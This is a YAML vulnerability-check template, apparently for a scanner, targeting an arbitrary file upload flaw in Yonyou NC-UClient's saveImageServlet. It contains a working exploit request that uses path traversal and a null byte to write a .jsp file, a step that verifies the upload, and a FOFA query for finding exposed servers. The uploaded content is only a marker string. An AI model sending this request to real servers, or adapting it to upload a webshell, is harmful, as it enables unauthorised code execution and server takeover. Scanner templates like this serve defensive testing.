product: 用友NC-UClient
vName: 用友NC-UClient doPost接口任意文件上传
type: 文件上传
vID: [ ]
level: 3
vDesc: 用友NC系统/servlet/saveImageServlet/接口处存在任意文件上传漏洞，攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
version: ''
note: ''
search:
  FOFA: app="用友-UFIDA-NC" && icon_hash="1085941792"
protocol: http
link: https://blog.csdn.net/wan___she__pi/article/details/137953339
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /portal/pt/servlet/saveImageServlet/doPost?pageId=login&filename=../52e039302a62d077.jsp%00
      header:
        Content-Type: application/octet-stream
      data: 95cc64dd2825f9df13ec4ad683ecf339
    verify:
      path: /portal/processxml/52e039302a62d077.jsp
      logic: and
      check:
        - body:
            value:
              - 95cc64dd2825f9df13ec4ad683ecf339
            logic: and